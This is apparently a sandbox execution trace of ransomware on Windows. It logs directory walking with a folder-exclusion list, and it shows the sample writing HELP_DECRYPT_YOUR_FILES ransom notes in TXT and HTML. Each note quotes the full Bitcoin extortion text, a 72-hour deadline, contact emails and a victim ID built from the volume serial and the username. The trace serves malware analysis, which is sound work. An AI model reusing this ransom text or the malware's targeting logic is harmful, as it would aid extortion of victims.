	[0158.222] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*" (normalized: "c:\\recovery\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x77d3b00f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98b0
	[0158.222] lstrlenW (lpString="C:\\Recovery\\*.*") returned 15
	[0158.223] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.223] CharLowerBuffW (in: lpsz="C:\\Recovery\\*.*", cchLength=0xf | out: lpsz="c:\\recovery\\*.*") returned 0xf
	[0158.223] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.223] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="windows") returned 0x0
	[0158.223] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.223] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="boot") returned 0x0
	[0158.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.224] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="system volume information") returned 0x0
	[0158.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.224] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.224] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="temp") returned 0x0
	[0158.225] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.225] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="program files") returned 0x0
	[0158.225] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.225] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.225] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.225] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="appdata") returned 0x0
	[0158.225] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.226] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="application data") returned 0x0
	[0158.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.226] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="winnt") returned 0x0
	[0158.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.226] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="tmp") returned 0x0
	[0158.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.226] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="cache") returned 0x0
	[0158.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.227] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.227] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="webcache") returned 0x0
	[0158.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.247] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="inetcache") returned 0x0
	[0158.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.247] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="nvidia") returned 0x0
	[0158.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.247] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="packages") returned 0x0
	[0158.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.248] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="cookies") returned 0x0
	[0158.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.248] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="programdata") returned 0x0
	[0158.248] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0158.248] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0158.248] FindNextFileW (in: hFindFile=0xfb98b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x77d3b00f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.248] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0158.248] FindNextFileW (in: hFindFile=0xfb98b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77d14daa, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x77d14daa, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77d613ff, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0158.249] FindNextFileW (in: hFindFile=0xfb98b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77ceee9a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x77ceee9a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77d14daa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0158.249] FindNextFileW (in: hFindFile=0xfb98b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="WINDOW~1")) returned 1
	[0158.249] lstrcmpW (lpString1="WindowsRE", lpString2="..") returned 1
	[0158.249] lstrcmpW (lpString1="WindowsRE", lpString2=".") returned 1
	[0158.249] lstrcpyW (in: lpString1=0x18dcbc, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery"
	[0158.249] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\"
	[0158.249] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="WindowsRE" | out: lpString1="C:\\Recovery\\WindowsRE") returned="C:\\Recovery\\WindowsRE"
	[0158.249] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Recovery\\WindowsRE" | out: lpString1="C:\\Recovery\\WindowsRE") returned="C:\\Recovery\\WindowsRE"
	[0158.249] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE", lpString2="\\" | out: lpString1="C:\\Recovery\\WindowsRE\\") returned="C:\\Recovery\\WindowsRE\\"
	[0158.250] lstrcpyW (in: lpString1=0x18cda4, lpString2="C:\\Recovery\\WindowsRE\\" | out: lpString1="C:\\Recovery\\WindowsRE\\") returned="C:\\Recovery\\WindowsRE\\"
	[0158.250] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="*.*" | out: lpString1="C:\\Recovery\\WindowsRE\\*.*") returned="C:\\Recovery\\WindowsRE\\*.*"
	[0158.250] FindFirstFileW (in: lpFileName="C:\\Recovery\\WindowsRE\\*.*" (normalized: "c:\\recovery\\windowsre\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0158.250] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\*.*") returned 25
	[0158.250] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.251] CharLowerBuffW (in: lpsz="C:\\Recovery\\WindowsRE\\*.*", cchLength=0x19 | out: lpsz="c:\\recovery\\windowsre\\*.*") returned 0x19
	[0158.251] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.251] StrStrW (lpFirst="c:\\recovery\\windowsre\\*.*", lpSrch="windows") returned="windowsre\\*.*"
	[0158.251] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0158.251] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Recovery\\WindowsRE" | out: lpString1="C:\\Recovery\\WindowsRE") returned="C:\\Recovery\\WindowsRE"
	[0158.251] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE", lpString2="\\*.*" | out: lpString1="C:\\Recovery\\WindowsRE\\*.*") returned="C:\\Recovery\\WindowsRE\\*.*"
	[0158.252] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.252] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.252] wsprintfW (in: param_1=0x18caa0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Recovery\\WindowsRE\\HELP_DECRYPT_YOUR_FILES.TXT") returned 49
	[0158.252] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\recovery\\windowsre\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0158.253] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.253] WriteFile (in: hFile=0x37c, lpBuffer=0x18be58*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18cd7c, lpOverlapped=0x0 | out: lpBuffer=0x18be58*, lpNumberOfBytesWritten=0x18cd7c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.256] CloseHandle (hObject=0x37c) returned 1
	[0158.256] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18be28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18be28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.257] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.257] GetUserNameA (in: lpBuffer=0x18bd0c, pcbBuffer=0x18be24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18be24) returned 1
	[0158.265] wsprintfW (in: param_1=0x18cca8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.265] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\recovery\\windowsre\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0158.265] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.266] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.266] WriteFile (in: hFile=0x37c, lpBuffer=0x18cca8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18cd84, lpOverlapped=0x0 | out: lpBuffer=0x18cca8*, lpNumberOfBytesWritten=0x18cd84*=0x30, lpOverlapped=0x0) returned 1
	[0158.266] CloseHandle (hObject=0x37c) returned 1
	[0158.267] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.267] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.267] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.267] wsprintfW (in: param_1=0x18ca60, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Recovery\\WindowsRE\\HELP_DECRYPT_YOUR_FILES.HTML") returned 50
	[0158.268] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\recovery\\windowsre\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0158.272] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.272] WriteFile (in: hFile=0x37c, lpBuffer=0x18c254*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18cd78, lpOverlapped=0x0 | out: lpBuffer=0x18c254*, lpNumberOfBytesWritten=0x18cd78*=0x808, lpOverlapped=0x0) returned 1
	[0158.281] CloseHandle (hObject=0x37c) returned 1
	[0158.282] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.283] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18c23c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18c23c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.283] GetUserNameA (in: lpBuffer=0x18c120, pcbBuffer=0x18c238 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18c238) returned 1
	[0158.285] wsprintfA (in: param_1=0x18cc68, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.285] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\recovery\\windowsre\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0158.285] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.286] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.286] WriteFile (in: hFile=0x37c, lpBuffer=0x18cc68*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18cd80, lpOverlapped=0x0 | out: lpBuffer=0x18cc68*, lpNumberOfBytesWritten=0x18cd80*=0x43, lpOverlapped=0x0) returned 1
	[0158.286] CloseHandle (hObject=0x37c) returned 1
	[0158.286] FindFirstFileW (in: lpFileName="C:\\Recovery\\WindowsRE\\*.*" (normalized: "c:\\recovery\\windowsre\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x77dd3b7f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0158.287] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\*.*") returned 25
	[0158.287] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.287] CharLowerBuffW (in: lpsz="C:\\Recovery\\WindowsRE\\*.*", cchLength=0x19 | out: lpsz="c:\\recovery\\windowsre\\*.*") returned 0x19
	[0158.287] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.288] StrStrW (lpFirst="c:\\recovery\\windowsre\\*.*", lpSrch="windows") returned="windowsre\\*.*"
	[0158.288] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0158.288] FindNextFileW (in: hFindFile=0xfb98b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="WINDOW~1")) returned 0
	[0158.288] FindClose (in: hFindFile=0xfb98b0 | out: hFindFile=0xfb98b0) returned 1
	[0158.288] FindClose (in: hFindFile=0xfb98b0 | out: hFindFile=0xfb98b0) returned 0
	[0158.289] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x858b6c65, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x858b6c65, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x6c2d42c9, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="swapfile.sys", cAlternateFileName="")) returned 1
	[0158.289] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x85289733, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x2dbfc137, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x2dbfc137, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1
	[0158.289] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1
	[0158.289] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1
	[0158.289] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0158.289] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0158.289] lstrcatW (in: lpString1="C:\\", lpString2="System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information"
	[0158.290] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information"
	[0158.290] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\"
	[0158.290] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\System Volume Information\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\"
	[0158.300] lstrcatW (in: lpString1="C:\\System Volume Information\\", lpString2="*.*" | out: lpString1="C:\\System Volume Information\\*.*") returned="C:\\System Volume Information\\*.*"
	[0158.300] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*" (normalized: "c:\\system volume information\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="WINDOW~1")) returned 0xffffffff
	[0158.301] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0158.301] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information"
	[0158.301] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\*.*" | out: lpString1="C:\\System Volume Information\\*.*") returned="C:\\System Volume Information\\*.*"
	[0158.301] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.301] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.301] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\System Volume Information\\HELP_DECRYPT_YOUR_FILES.TXT") returned 56
	[0158.302] CreateFileW (lpFileName="C:\\System Volume Information\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\system volume information\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0158.302] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.302] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18cb68, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0) returned 0
	[0158.302] CloseHandle (hObject=0xffffffff) returned 1
	[0158.302] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.303] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0158.305] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.305] CreateFileW (lpFileName="C:\\System Volume Information\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\system volume information\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0158.305] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff
	[0158.305] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
